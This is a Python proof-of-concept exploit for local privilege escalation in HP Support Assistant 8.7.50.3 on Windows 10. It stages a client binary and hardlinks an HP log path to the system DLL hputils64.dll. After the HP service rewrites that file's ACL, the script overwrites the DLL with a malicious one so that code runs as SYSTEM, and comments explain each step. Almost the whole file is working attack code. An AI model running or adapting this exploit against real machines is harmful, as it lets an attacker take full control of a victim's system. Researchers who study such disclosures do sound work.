#coding: utf-8
'''
working with:
    + python 2.7
    + HP Support Assistant: 8.7.50.3
    + Windows 10 64bit
Install any .NET Framework version the exploit asks for when it is first run (the staged client is a .NET binary).

Source:
    + CreateHardlink.exe: from symboliclink-testing-tools-master (https://github.com/googleprojectzero/symboliclink-testing-tools)
    + CreateProcess.exe: CreateProcess.cpp
    + userenv.dll: DllLoadInvader.cpp
    + invader.exe: invader.cs
'''
import ntpath
import os
import shutil
import subprocess
import sys
import time

import __main__
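startTime = time.time()

# Every path below is derived from the script's own location or from %TMP%;
# none of it is attacker-controlled, so plain string concatenation is fine.
mainDir = os.path.dirname(os.path.realpath(__main__.__file__))
_tmpRoot = os.getenv('tmp')
if _tmpRoot is None:
    # The original expression would die with a bare TypeError here.
    sys.exit('Environment variable %tmp% is not set; cannot stage the client')
tmpDir = _tmpRoot + '\\HPBatteryCheck'

HPBatteryCheckDir = mainDir + '\\BatteryTest'
clientExe = tmpDir + '\\BatteryTest.exe'
createProcess = mainDir + '\\CreateProcess.exe'
createHardLink = mainDir + '\\CreateHardlink.exe'
# DLL whose ACL is polled and whose contents are later replaced with MalDll.dll.
victim = 'C:\\Program Files (x86)\\HP\\Shared\\hputils64.dll'
# Path under the HP Support Framework log directory that is turned into a
# hardlink to `victim`.  Presumably the HP service later rewrites the ACL of
# this "log file", and because it is a hardlink the new ACL lands on the DLL
# instead -- that is what the icacls poll below waits for.
hardlink = 'C:\\ProgramData\\Hewlett-Packard\\HP Support Framework\\Logs\\Temp\\HPSA\\hardlink.xml'
malDll = mainDir + '\\MalDll.dll'
icacls = 'C:\\Windows\\System32\\icacls.exe'
# ACE text icacls prints once BUILTIN\Users has full control.
# NOTE(review): icacls prints localized group names on non-English Windows,
# so this marker only matches on English installs.
FULL_ACCESS_MARKER = b'BUILTIN\\Users:(F)'


def _stage_client(srcDir, dstDir):
    """Create dstDir if needed and copy the files directly inside srcDir into it.

    Mirrors what the PoC previously did with ``copy "src" "dst"`` through
    os.system (top-level files only, no recursion) but without building a
    shell command line and without cmd's interactive overwrite prompt.

    Raises OSError/IOError if srcDir does not exist or a copy fails.
    """
    if not os.path.exists(dstDir):
        os.mkdir(dstDir)
    for name in os.listdir(srcDir):
        src = os.path.join(srcDir, name)
        if os.path.isfile(src):
            shutil.copy(src, dstDir)


def _wait_for_full_access(path, marker=FULL_ACCESS_MARKER, interval=0.1):
    """Block until ``icacls path`` reports `marker` among the ACEs of `path`.

    Polls forever: the ACL change is made by an external service whose timing
    is unknown.  Raises subprocess.CalledProcessError if icacls itself fails
    (e.g. `path` does not exist), instead of spinning indefinitely.
    """
    while True:
        out = subprocess.check_output([icacls, path])
        if marker in out:
            return
        time.sleep(interval)


def _wait_for_system_notepad(interval=0.5):
    """Block until tasklist lists notepad.exe in the "Services" session.

    "Services" is the Session Name tasklist prints for session-0 (service)
    processes, so a notepad.exe there is the one spawned by the SYSTEM service
    rather than one started by the desktop user.  Sleeps `interval` seconds
    between polls so the loop does not spawn tasklist back-to-back.
    """
    while True:
        out = subprocess.check_output(['tasklist'])
        for line in out.lower().split(b'\r\n'):
            if b'services' in line and b'notepad.exe' in line:
                return
        print('Waiting')
        time.sleep(interval)


# 1. Stage the client binary in %tmp%\HPBatteryCheck.
_stage_client(HPBatteryCheckDir, tmpDir)

# 2. Hardlink the log-file path to the target DLL.  Argument lists, no shell.
subprocess.call([createHardLink, hardlink, victim])

# 3. Launch the staged client via the CreateProcess.exe helper.  The quoted
#    argument form is what the helper expects, so it is kept verbatim.
subprocess.call([createProcess, '"%s"' % clientExe])

# 4. Wait for the DLL's ACL to grant Users full control.
_wait_for_full_access(victim)
print('Successfully get full permissions on hputils64')

# 5. Replace the DLL.  The ACE check is a point-in-time snapshot; if the ACL
#    is reverted between the check and this write, the IOError surfaces here.
#    NOTE: nothing is cleaned up afterwards -- the hardlink, the staged files
#    and the overwritten DLL are all left on the machine.
with open(malDll, 'rb') as src:
    payload = src.read()
with open(victim, 'wb') as dst:
    dst.write(payload)
print('Finished fake hputils64. Wait for notepad with SYSTEM permission')

# 6. Wait for the service to load the replaced DLL and spawn notepad as SYSTEM.
_wait_for_system_notepad()
print('Notepad run!')
elapsedTime = time.time() - startTime
print('Elapsed: %d seconds' % elapsedTime)
sys.exit(0)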